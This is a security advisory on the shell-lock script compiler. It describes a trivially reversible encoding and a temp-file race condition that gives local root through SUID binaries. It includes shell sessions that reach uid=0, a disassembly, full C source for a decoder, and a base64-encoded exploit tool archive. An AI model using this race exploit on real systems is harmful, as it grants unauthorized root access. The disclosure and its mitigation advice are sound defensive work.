COMMAND
shell-lock
SYSTEMS AFFECTED
Those running shell-lock (available for all UNIX platforms)
PROBLEM
Following is based on L0pht Security Advisory. (a) A trivial
encoding mechanism is used for obfuscating the shell code in the
"compiled" binary. Anyone with read permissions to the file in
question can decode and retrieve the original shell code. Another
vulnerability exists where the user can retrieve the un-encoded
shell script without needing to actually decode the binary.
(b) The vendors claim the program to be useful in creating SUID
binaries on systems that do not honor SUID shell scripts and also
to protect against the security problems with SUID shell scripts.
As it turns out any shell-lock "compiled" program that is SUID
root will allow any user to execute any program with root
privileges.
Example (a'):
[slaughter-house] cat q.sh
#!/bin/sh
echo "hi there... this is a test"
[slaughter-house] shell-lock -o q q.sh
SHELL-LOCK(tm)
Shell Script Security Software
Copyright (C) 1989-1999
Cactus International, Inc.
(Version: 2.1.1.1 7/19/99)
Converting files: q.sh
Compiling.....DEMO Version...
Success!!
The shell script "q" has been compiled and placed in "q"
Conversion successful!!
[slaughter-house] file q
q: ELF 32-bit MSB executable SPARC Version 1, dynamically linked, stripped
[slaughter-house] ./q
hi there... this is a test
[slaughter-house] strings ./q
(some stuff... not the ascii from the shell script)
[slaughter-house] ./codem -d -i ./q
#!/bin/sh
rm -f $0 2>/dev/null
echo "hi there... this is a test"
Example (a''):
[slaughter-house] temp-watch -d /var/tmp -C 'q*' -D ./ &
[1] 22971
[slaughter-house] nice +10 ./q
hi there... this is a test
[slaughter-house] more q*
#!/bin/sh
rm -f $0 2>/dev/null
echo "hi there... this is a test"
Example (b):
# ls -l q
-rwxr-xr-x 1 mudge other 50753 Sep 28 14:24 q
# chown root q
# chmod 4755 q
# exit
[slaughter-house] id
uid=789(mudge) gid=1(other)
[slaughter-house] ls -l q
-rwsr-xr-x 1 root other 50753 Sep 28 14:24 q
[slaughter-house] temp-watch -X '^q*' -R /bin/sh -d /var/tmp &
[1] 23071
[slaughter-house] nice +10 ./q
# id
uid=0(root) gid=1(other)
So, what's shell-lock? Have you ever seen the big advertisements
run in the back of SysAdmin magazine. You know, the ones with the
Texan with the huge hat and sunglasses? Well, that is Cactus
software. The program "shell-lock" is used to create ELF binaries
from shell scripts. Ostensibly called a Shell Script Compiler,
the literature states that the program also hides the original
shell code so as not to be returnable through running strings(1)
on the binary.
A quick decompilation shows that the encoding and decoding
routines look as follows:
0x16194 : inc %i4 Increment the counter
0x16198 : srl %i4, 0x1f, %o0 {
0x1619c : add %i4, %o0, %o0 { testing for odd v even
0x161a0 : andn %o0, 1, %o0 {
0x161a4 : cmp %i4, %o0 {
0x161a8 : bne 0x161b8 If they match
0x161ac : add %o1, 0x63, %o2 add 0x63 to the value
0x161b0 : b 0x161c0 else
0x161b4 : ld [ %i1 ], %o0
0x161b8 : add %o1, 0x44, %o2 add 0x44 to the value
0x161bc : ld [ %i1 ], %o0
0x161c0 : deccc %o0
0x161c4 : bneg 0x16228
0x161c8 : st %o0, [ %i1 ]
0x161cc : ld [ %i1 + 4 ], %o0
0x161d0 : add %o0, 1, %o1
0x161d4 : st %o1, [ %i1 + 4 ]
0x161d8 : and %o2, 0xff, %o1 and with 0xff (hey it's
0x161dc : stb %o1, [ %o0 ] ascii printable after all)
0x161e0 : ld [ %i0 ], %o0
0x161e4 : deccc %o0
This basically boils down to the following C code snippit.
for (i=0; i < strlen ; i++){
if (!(i % 2))
outbuff[i] = (inbuff[i] + 0x44) & 0xff;
else
outbuff[i] = (inbuff[i] + 0x63) & 0xff;
}
Conversely the decoding subtracts 0x44 and 0x63 alternately. What
shell-lock does when it creates the initial "compiled" binary
from the shell script is to add the line "rm -f $0 2>/dev/null" to
the bourne shell script (or "unlink $ZERO ;
$ZERO=ENV{'X0'};\n.\nw\nq" for a perl script) and encodes the
entire file. This is then copied into the data section of a
skeleton binary file. The binary file, upon execution, reads the
encoded data section and writes it out to a temporary file
(*note: the default location is /var/tmp though it will follow
the TMPDIR variable) and then execve's /bin/sh to call the
program.
The first method of extracting the data comes in using the
attached program to read the binary and run the data section
through the decoding routine.
The second method of extraction is to use the current version of
temp-watch (available freely from the L0pht advisories site) to
make a copy of the temporary file containing the original shell
code that is created when the binary is run.
The SUID root vulnerability lies in the fact that while the
temporary file is created without any special permissions, the
file exec'ing it is running as root. Thus, as soon as one sees
the temporary file the race condition exists where the user can
unlink the file and replace it with a different file or a symlink
to the program wishing to be executed. This is accomplished in
the above example with the program temp-watch using arguments
specifying the replacement of the temporary file with a link to
/bin/sh. Code follows. temp-watch can be found at
http://www.l0pht.com/advisories/l0pht-watch.tar.gz
Below you'll find that mimed and codem after that.
---
Content-Type: application/octet-stream; name="slock.tgz"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="slock.tgz"
Content-MD5: t3S/3D5mpdTMzHiMH1lhWA==
H4sICJEx+TcAA2wwcGh0LXdhdGNoLnRhcgDsPGt308iS8xX9ip6wYDvYjp2HwyQT5obYQHYC
4djhklmGk6NIbVs3suSVZJIsw3/fquqHWg8/wmTYe+/iA7Hc6qquqq6ul7qV8Mm0cW0nznjj
tX3Fh57Pf7jvT6vdanW2t39otVrt7XYbv/FSfre2dra3fmh1dnc3tzutra1NaG/vtNutH1r3
TknJZxYndgRDTmbuaBHrYTLm0YL7xMp2S3zv7N43mX/V5yFT086GYcQSrQ51dmnH3GXhcAj/
2avw8tJLYhbwxLETNpFATesh84JP4RVn114yZmt4g8W3cXI75Wus0WDekN2Gs0i1MQ9whAlz
ATwA9El0y9ZGPOCR56whMurOpmGUsCRkJHWC5ZOYTX0ONMHgns/gBnO94TDGbjR5f/Nb03HS
dMKJZT18+JC97fe6vRfHb3oD+M3g8vDdydmgDrjj2Lv0b1n4iUeR57o8YJe37GdJ4TMWcWcW
xd4nzhzb9/cAeOo5V2zkOJK8issimyirMztwN0BwbsgaIxAFEGqj0FjjFDu7/HI2GnnBCJCY
190XJ4cvB+yANbpnvcEZfHV7z9+9tIz2fu9l79w6kg2ArvEeqLHOVQ/5echukshmztC3R3Gd
xTxBZpS0QbdHPImt85Pj5waQgvK9yxjJDLjD49iObn8B2hrPYUkknkMKEc+CENCyhtEGgqgz
0IMmY7/BXF3bAczV2INuSQTLiU1ALQZnh2fHR+zAOoI/DCT3H1XBSs066UIL/DyqAVaixfeC
Kx7to1LYMz+hKY2TyJtOQUP4DUxHYl/6PLZCgAwZM9gIL//BnQQ6JTyIvTCwjn49671+e3H6
/D8HB86YO1cXyWTaDJlr80kYwIXvxcnFLPH8GH7MYnvEm6FlHZ6cAO5U/S2LkRI9P315+qZx
dHh29KrXB0W6DEezeM968DfujEO29g7h9xitB2aoEPsQThMgJ/64pvsys4Njg9IBZBz6duTF
m526utqpn0558HzQretlQZS8Oux32dlh/2XvDOhIKd17ALJMma5Z8PukWwMJC2XCq3N9JeYF
JB8azLLfrRwShEGVqVmWKcS9B+kvh2COlg7kMBPG0vOw90Bero5IA1iZSdx7YPxcHVsGyJKa
AMjE1ep4ZH9miXka/DY4++0tGB09taAupB8NDoCgaAj/WmICyQukB5VGd3B6ctg/HjB9tdlR
hkB9v+1fbL2sINjR0cHayFxYa4ym7KDhg+JYevidPzH8zt2Hlcq78qDQN8vj0Sko4dZRhZWM
JKR+II2RZckV8m0Ge2iyiTPdP3zTPX0NKwTcUgA0RBPWGCoK1kGXnDDilvV/7eIXflIjsNHv
HXZf9/6CMZbEf63dDsZ/ne2drc12Z6uD8d/21tbW9/jvG3yORbw1g7AKXbiI4jC2iviI37Dh
LHDQj9m+l9yCwwK/FfHhzGfXY4gCEdINm+xFGFkY+tiBAy7N8CuNI1ZZrwBS31fOHX073YRA
iAbaAMcAkRwEXUkY3VoQTzHbj0MI9mxH9cFQEwKVhDkRtxMICrygBLbJzgQLECaJjhCdQVcP
Qk0PfvhhOG1aVi+AYAIxD25jPxyJ0ZJZFMSEcxqFGAwBHFBqQxTsXI2icAZkSfdjWSIqTcY2
UgFyaEBIyy69EQjNdiecwV1eJ+mM7U+csMYQAztIj8uOKxOWAM1u03qNkSyOADdAvDOM4Ibe
DYcvHoxRnBMeJPALxc0hXJUIQJxeANYFwmRot+wpED2NPOQ4DFBSQRPcUT4qbm883fjpp6w9
Mta/4abvV8cWr//Nrd3Orsj/djuQDe5S/rez+z3/+xafjXXQ8f+eeaSCLq4lWOdj1Ehcp2EE
zU4ECZPOwbCXWNxTOwK/OIMow4LQVq1Cj8dNdhpTOI5JFoXy0BOQTibgrGHdhQEbh9eg9y6b
8hCSOgZGBVoRDS1oUOYpdIwh2/D98BphMEWIZdZBf5o0Yexpc7PV/OkpW98Anwxrwp+5nK2l
qjyG6PlT6LkiSqs6Yzti67BaRoE94bV9C9KMGeQPGAsOxOW67bpB6PJqya06EwjUdzmCaTQL
ODaUoQAQsCwiJr7DMAQTTm/REkou4shRHdw4MfHCXFQ15ENvCKaXifySRHFt+1cLyHvIA0is
CdslB7vBL4ThqyIw3Kc7kIMHVbyABFOTsQ4/PtU+Q+7EiJa6IBky04NWHRxAnKjriKN557mf
Lhivg9a+BAcPZILLPqR7aduo2LzPkGddYaimYV5NY040m4xyxyiQLEDaBkwgCVI4qNcAsu5O
sbF73IdLL6IfAoJGhiZIH9fQH63V2TrSjQpWR31uf3h9eP7m8PVJ783HFAylIaAUAoCbJlHa
Q8kIazMH7M27k5PCPbEQ1c081zJsr2kofjO9nA2RdR/8/SIpkfe/oDnQg/IoCqMLQDDk0YfN
nc5HLUMtSiuVm6lUeK2pxC7keNVsgQlC/+xBjPE/XC5kUllRAWHg/FAE1aoDOEY8gSmqCq1D
dauztYG75+wd7XX3xv29m73zvbVajf14wHqnL0AXiddVkUgUOQSSOaAboiOQd9WBZlGAcLAe
VXEre5YqSRjqkOqS+FxCeHC1n4HsGpCpRuQBYZ6qP+qVLfsBjZ91DwZhC2j2sLrmBZ9AkC5h
Q+XdY4/i34O1ukJf2zeA+I2XVNtG05cMNTRD7YUMOAYDSutLOADFhlZllEBFImcMNkovk8pG
pZblFyBqJn8GcoWm+uQJ9tovkcLUhjAW64wzrGFi0UoZTwjWwgD8El4Tvg+P4o8kIDVCqTiU
JYLhiwLJ6WsqnaN/c+kssDiK1iqrCrODZcBwMiX/pTlDkyD+gjofCBNRK1PrIUTKWC4OFRJh
oqZM63cJgaUKvtz4iQ84CSCZnNBkWn0MF+kYdZzri975We9Nt9fNzQ0AZlhAQtF04o06E4hM
W1pnMRi+cFg1G2ulEydYzfTLspY1x3r8xdprdhd6OzD0NjXWT54sNAV9A8jw7yZU1qWtYB9v
ijiVz1ttEWWAVllJuVH+otVkoCkbuNQE5SOdu5mi8/uU5L+mIL/SWmUZv0eLNYfQ+Vbr64xW
lv5/LcO1ms4XDdhYa7v4/Yuh/SITxLDvQ+tjrdT84KL7QmkMiCU1gFI62JjNjGpabkPJMcRa
wC3ElakaCBBVRWo2cZYhtQXBaCIyEy9WfjjlAQxfXaM6jijVgO6cnL68eHvcFRfvBr0+AWma
C3J7/JhVtRf44w/TKSji1Vxxj8pbYuFiui+RMbkgzbYmewPr9TJMxs2UD4OLhQSVzG+OFMcO
0B7EU+54w1saJ2tX6KnnspFT9weDaq6Xj0TMrjCCCpUR/Y8ri3mCj0rVeDQU4JK/seKhAvj5
Y2MeSuYb9T+qqsyDOlDKgB3yfIYz3yUji2DKEmVAiwNBhhYnfDaVtdgICOM+lSbxSTc2UoYH
qVuaZ7lTMkS2SykLEkI5lWEuiUQErOEAAm3iTbjAkxqlUg3RCIzSQcZ40cpNosABO+hOG8/c
CxG4Za0h9ACPkhlEmPVWNruitDZwprdVTOjrRs6uc3vwUe2M7SMYx04kyNrGWvF2kN43iaxm
scIfSSh2reXQzAIsjolbuQFuJ3TLCLtERSLXz5Bh1sCa4Ye6Ut8URssFdrdJWuqHyRPb7ics
gGcmT/jmmk7rl/pDwkR+lzvSHZr4Wsqft+Skf57jiv69NaBsko0lmDOZqpmVLa80Q5L06rRM
LyszZru7TBdK9F7kSbzpWqtEJYsnSktMGZfGCOYU4K0q+ulevw80u54wwGTzH8UQOUfhJZjT
X2pki0tm8YtYbHnMyqZ/BcLSyc8Y3BJeFtpb/MzXw9Vt0UJrNI/yRbbJ0N5VEoAVzM4KxYP7
sjrf18f39fEXrA9ZkFdPuvCnqV2pYtT2mTLXOj0i3xDxay9IYzsq68vQry35Xj0SlKKrpg/F
FlBUy7mhBbHH0im57yDx64KEpWHCvQUK/wQquHLg+LWh430Gj/cZPn7XDbZcN+aEm1IX7hpx
1j5n64P/vBH8XX3qUq+6il9NwpBNcOMRtHg8ZraPVvpWuMUCPvkpnfM5DniBC1449pxB5mrS
Mse8gmterP130f8lK2ARH8us5V1CWcHz/USz/z+y6O9r8PsaLF+Dq8TJsvPGOnP8MOZpZJyW
MwXCL+oZXUtEyWozFlVCMw8zZJSebicTXYRPKwTgiBlGZ2XjU8COW1ypqosBvLImpfs/x/e7
x3DJ/u92Z0fs/25td1rtrR2x/3On/X3/5zf4gC4GqIwXF0eveke/XpyB6X9lPRTuINeabrD8
Gayi7102x8+ybV6Ya7qNN/C8U1xsxlMV2Vax0y7bNr12sw2jaJptGDpB4hfRT8CwZVtnAawe
wjbfeaa9xbPaiFAszhZyMALC9H5ZysAfCBoEsgfssNs9Pjs+fcPaWuxs8O75Wf/wiJpbui97
fdrtDY7/q8fabatk4ynaU3rKrh6TpxsP2RPWps2HEgqlT39oP2Dppr1pxD/NuRXwmwTMCNYG
aDNo6gNpN98oCt1bZoNtwU3y4Ww0pmdDaJ2SMe3rxU3B4xkiBejZFO/KPa1671MQJ3LXYlwX
u0nlDleVA2S6tDEPMH5vimfTFwkLAEzjpshDb5nNweB22nIgiC3uCrQYBnrSTtz1CZ/EPKmK
H4rRDEY8VSb06C9Z/4b9V6fr7n2Mped/cM9/p7PV2exs73baZP9b3/f/f5PPvD3zuFbtKx6w
YRRO2AAPnwQxO3z7roeLdc7ecDBAYDCmngu6C3/31QNyVoVfEMkMw+iqWquxnyGWlkEMBSUN
EcHpVAd7/3igOtHT6FaNTIvLcY8QmA86qWOjw7B9CBu9RIY5sJpiz62KgiQAXPNKxNkopJNE
IVHA7JHtBbS/CB/608P2wW+Dv0fb2MML4lnE6VyPCNuuuTjFE+BGniCJQp8OD4Fxm3gBDC7G
/VNssrvzSRFoVeVCs4kdXyFsGui1KNBbOv/G+jfPw96rji05/7MD60XEf1vbO+1d7NfuwFr6
vv6/wWfe+pfH/ckxUQI5/6wK3KRzMCnAiCcYgkwAJK6aEceSgzPsbkdv7kLcNzmk87VHbVYX
WskxoPzdwgGgUklbC0Qt0tzs6ZbSnZbpR3RGqiir14dsyiPLBM+6gKZd4E5TZamNDUDJOMKo
UWTO6Tahz2ZWXCrRie37oVOV2xILPVTFJ49yQSWnUMFBg6kOwEXhKLInLJzRPiiI5fAQarPJ
Snb2FaozU7G1ci0DnIGQ3yV7AlUkiyw0nqlof1k1TUaleaC0nqZi3XwPUWgxUcoqWrZjzRhL
7EP1UX8L6LLKXXss7stkxJghczvq6vPzKJZVJMjTLjm4Yo4eXGx7o5yz2SzdOJzjZf686R2t
q40zD68xnaILJlXGOS/VjGlYplmW0RJVnk0NoFi3Kp9MZwLDAVldMhiiu7DuRCEJY42xfHUN
rbB/4PZECJNo/6wsYYmN4Xhb4JZPeKFZ0KlJon66eV+PheYQRwKzpweiA98uliZdPZCJGOVS
gljkoNSuLMk9GAWJap7e3btZkIfTVjQJOVOg5kTrjqQ+K5YSzdJ3pHKlMEKMWTzK2hDEEmOT
szU5kKKpyXWYa2ky/eYZmhyyvJ2h26mZ+UZ2Jkv5vZmVOWhNzZhvKMgBZ+zEFytvKb7Ic9PW
wgBLmBw6B0zviRCHfykaQE8+Dn33w2YnPfY6i3lElam20YivV5gWWnUw9KHdTlthbUxnOPwH
49nOOtussSdMnEmVHVGGMNHzS2BTO46vXYhGriG5MtqJGrZOX/KODmcsdQa0qtlFyZKNVPJU
Bw3UstEUg9I8YTB1m3q6jBMHhMIo+y3C0piLRb5jYy9/5wsTZ3Mxq4dpAUWaTIWt1Y/j5GzB
snHwupp1y01IDakd5bxd0yc/FJgworKapVtR5JvQufJ7q1IEwVW8iY8zsGaAk2AYcDU5NYiK
p9czyOgL5MzoMLo8e4TgtYy1UppWF7jB1l3Lh4KSDtWhppNyFb/rtx8JhHJppgjXHjV3XJgC
PP9em0PXQ23Z46CAIE8BolyOUJ2xZkzppiEwaiJxjaJRmbhGhrgUfFZiehnW9QCNZ6MoKzXd
aVWxGVgXy200T24GhgIRiyU3MiWHcjNTrKyC11N7I3yDoj9deED+ZsweNdrt5mYLLzZd+PNU
/lDfHR9b2y36uVaaNCGiVpx5vCvtCT5m1naZ/UIGg+3JFa8JzASv5ZyTC6mzVOVSIZqwfhiM
isAo5TpLLUIhhJVqNLg4Hpy8+bWoa0hljUnjqI6k2S49vM1nA9JO67mVv2vZRADrZI229scq
fDCtIms8Qylta7tY0kkPhm6RCm300iP4F14BAYFD3ha8rsM1xQvz3twnwdcLTjx6yVGOHxXa
Lj9atkysir00Ijk86fXPKCah2EAznA34ESh7Hi/Xk7Hh0J/F4yptzdRbPS3zgbVGAMsgXQOx
+qO0PxZ/aZBUb/+M2po6f3eNVTbgS2k1xFpYDNKFgvJSRjutZRQesNHTNYvC6raROVFkhm3p
EsHIKyt2IzVTB6ywgC0a6OndDAvIl7NR5uAVojWzMWNoEem3jaTMgFFbWZG2qo6n2+ZSfRzT
wtSrMBNQghiM8EXF1yLkwFNj+k0+lzzBB4O4E2VsT/EQmh2zOJxw3KpxTYGueGtWKCNh1sye
CEt5UOdv8eCdaBWpTuFU7jDigkhjp0he6GJxLhyn9jktVKkDcJAio2wxv6PnCnUyKSsYjaIc
NJd61lKm9ou8yFnezwCVFAxoDhS7QgjmnpS0D51IvOTMZhPPdX068ImZumIVeRyFoZtCp5k3
4tVznqFePUdOKcxmq1n+LINJlYzvF2eFigLp/GbpyEusJN1tGzNOm2ZYLv9JzXWmqLtwv07p
pJVmVrhLSNWW5d2YtZE/8B3Xtt6KhUsHMsAWvaM3TNSjN2thYdos30J+LnfJ6gItWcT55kwn
UKUbCKx8EchIIcRAesRiCVIWBbK1AOWl0wJAEVwWASRqlf5nDZh5qBSlglsEcgUBuSnYyky3
MglGJaZQZdJnHtIna6lXNKr91qJyv3QjCwWf2nwqv9EbudF4zpwrrAh58oxtbhaseZW4sjoc
9TQqa9m4gFbIoxuQsDOLIrzCNy3gCw5xzT66SWsP2JMuc7WIeio4KdlScS4a0hjtruPpVwks
e6aiw36xMDBs4JGYHux9kdAXSUxmtaKLSmbVVhyR9+IyPlD7aTAyudDQKqJ7cfzitEoRnJgb
ge5D6yMAVoaVzINh7H/0qj+3u1Ps3j2e390tdn9+8uvc7pfF7v3ey7ndG8XuGL3O6+4Xuw9O
j+b3jyu5F5vJNLNWkMDp6XwRTCv7Zfu4ng+6BTzvX53NRfOoUnznmTYcmZ6/VNRzrfA6ADc/
xe0CMb6hPBZruIqD9d8N+uwxE4E9BBmyCVM/qW8f2oQuqtQgD8y2NcQbWAjR+yKi9zlEmwR0
nUG0WUB0XkR0nkO0RUA3GURbKSLBtaiizeH6Zf9tnmtoMsfYLuF6u8h1EdH7HKKdEq53ilwX
EZ3nEHVKuO7kuRYvhp3D9enZqzzX0GSOsVvC9W6R6yKi9zlET0u4flrkuojoPIfopxKufzIQ
CbYH7467Ra4pk8AVhXezw2CT4bANJRKjSUecUa64UnDUmfuDyr58juzzjYg7YeQyP3SuMOcg
enTWTUS9LBL1soyozhyiOkuI6miiFtLEMkT9/ew8TxQ05WoDqak3n1oYk5MhVxMkpi2plD56
yvQ5q6QPm79YKl5Vr2JKw9UwYPHMoZclt/AHvuoG907pKDW7UQF3kokHPNmtBXrHwNDF9Gno
hjOMX4MkEu8CdWzXjcAh015LNzZr9fltrISYXscC4xiv3VSv1tSBU/7lVilt6sVW6pVWKoQR
rzHTQhNoFNi+VVYEVSVERRBVQNutViz+NqlymT5Go9gG2TbKoLoImuLIxNVU9Nl4tASXqn+S
nqGU5VtjDLZPL/rd0zcnv8ltazIqlA8kVTcCUo/wjGjYWFtDqhyImXysHraVocR7i1EBMlQF
RWsqAaT1fZ/9ARdH/d7hGV31zo9O6OKs/+7N0bztKvlqmkkaRttVlBkdGCHpwd12C6sLghLo
y8SNJ0/04tPqprIU+ZvSFFxPhOgJ236qVt6fYKuMqzxP5k4RmhJFe1q4kZOgxs7Ma2468hXL
bNGNPdNo8S4oLb+qyhWc70rqOuj9b3tX99o2DMTf+1eIMkg70pJkpYG9lSRjow8rTqGBsQXX
UWMzf2E7LGXd/z7dnWRbspJ4Y2tefC+OHel0sr7Pd/eb3S7ns3uc32oaXSUSctgjSlnUjywo
uCrqVHT+IXqVNzliwr2VK3mK6mUQHzaK3PRs0KhBn92JFXsJOAkwDO+W8483zmy6w02LxsCA
PMXP5CR2bqszjkgoc6+USsQVKvIOiyh6Df5+cD7dzzR562NDvsB2YkI/OiAnXsSJCRQCaPlO
FvK6lEqjE21iqMaOJLUUxMmS4he2Hno84aSDD9WtEFfuUXTnJ6V9gWC7mvKFVrNNGPZJ5QIL
mq5zqQzrlGdgTZOir0YnakjAhChTm3OiOfudKEdntc435qsdOVxchqtiHpafb0UHWIhLIw9r
uIMd2wi1o6NRzf5b4hj9+zIO4f+N4L/r8fh69G5wNUL776vxcNzZf78C/Tlmwk+1z37r9enx
OiBVl2fZWKts+sbak9tqyozZQMFcmRTo/yomtIGXekMJvQaOzACMMrwE/+6VN5k624VPekNi
gFxVrptN4SfZexMxEDWNWkJc3i5WFboMPpiWd4A6mMRBAZvGOm4dQACc25l5VfxapA+w9QI+
gF3lkl928sQ2KRysOIdDYmCXq0lSlkt7yZNXKLkqAsF5gpxsmsqPSi3ZZXwNkCIQpSDjqE4g
TCKKjBl4Ek3EjVctGcIXrMjNvvMsZ1+Y6E+9bz00Ou296bGv9vc1ZXq7a82eF2CVJ33mRV3r
zd9SJugk9pLnRkoEK+KiUcQZDqBTnuR3f7HHymEA5C1LZBS5l9CRoD0EjzUXQzwW534mzRpb
80I0Fpb79EV3kyo8puqlPWInstu/GHSKyw9v255AOyuBlhD2N+sYY8CRUW2xd7kQXOAxCQMP
60Zf2im1ndvW4FbeKXgr6V9WRsq1s1kYbCTq1l8xa1KcFBwwWEXdCW+SImtjjS8mLx4Fp06f
W7IzYgETm+3LgqxdojR83l9Z3+Dn8zAVp0KcK3Iv4zyupuHS1BmOFN38/9/m/2PvPzrqqKPj
0W/5+TLQAH4AAA==
-----
And now codem:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
void usage(char *);
int main(int argc, char *argv[]){
int fdin, fdout;
int strlen, i, c;
int cryptFlag=0, decryptFlag=0,seekFlag=0;
int seekOffset=50688;
char *infile=NULL, *outfile=NULL;
char inbuff[8192];
char outbuff[8192];
while ((c = getopt(argc, argv, "cdhi:o:s:")) != EOF){
switch (c) {
case 'c':
cryptFlag++;
break;
case 'd':
decryptFlag++;
break;
case 'i':
infile = optarg;
break;
case 'o':
outfile = optarg;
break;
case 's':
seekOffset = atoi(optarg);
break;
case 'h':
usage(argv[0]);
break;
default:
usage(argv[0]);
break;
}
}
if ((cryptFlag && decryptFlag) || (!cryptFlag && !decryptFlag)){
printf("Must specify either -c or -d but not both\n");
usage(argv[0]);
}
if (infile){
fdin = open(infile, O_RDONLY);
if (fdin == -1){
perror("open infile");
}
} else {
fdin = STDIN_FILENO;
}
if (outfile){
fdout = open(outfile, O_WRONLY|O_CREAT|O_EXCL, 0644);
if (fdout == -1){
perror("open outfiel");
}
} else {
fdout = STDOUT_FILENO;
}
memset(inbuff, '\0', sizeof(inbuff));
memset(outbuff, '\0', sizeof(outbuff));
if (decryptFlag)
lseek(fdin, seekOffset, SEEK_SET);
while ((strlen = read(fdin, inbuff, sizeof(inbuff))) != 0){
for (i=0; i < strlen ; i++){
if (cryptFlag){
if (!(i % 2))
outbuff[i] = (inbuff[i] + 0x44) & 0xff;
else
outbuff[i] = (inbuff[i] + 0x63) & 0xff;
} else {
if (!(i % 2))
outbuff[i] = inbuff[i] - 0x44;
else
outbuff[i] = inbuff[i] - 0x63;
}
}
write(fdout, outbuff, strlen);
}
close(fdin);
close(fdout);
return(0);
}
void usage(char *progname){
char *c;
c = strrchr(progname, '/');
if (c)
c++;
else
c = progname;
printf("Usage: %s -cd[h] [-i infile] [-o outfile] [-s seek] \n", c);
printf(" Shell-lock {en,de}coder by mudge@l0pht.com and _lumpy\n");
printf(" -c encrypt\n");
printf(" -d decrypt\n");
printf(" -h help\n");
printf(" -i <file> input file\n");
printf(" -o <file> output file\n");
printf(" -s <offset> seed offset [defaults to 50688]\n");
exit(1);
}
SOLUTION
Do not take candy or accept car rides from strangers. If
something seems too good to be true it probably is. There are
few magic solutions that negate having to do things right in the
first place.
If you need a shell script to run with root priveledges consider
writing it in C or using something like sudo.
Do not rely upon shell-lock as an obfuscation mechanism for hiding
the internals of shell scripts in 'compiled' binaries.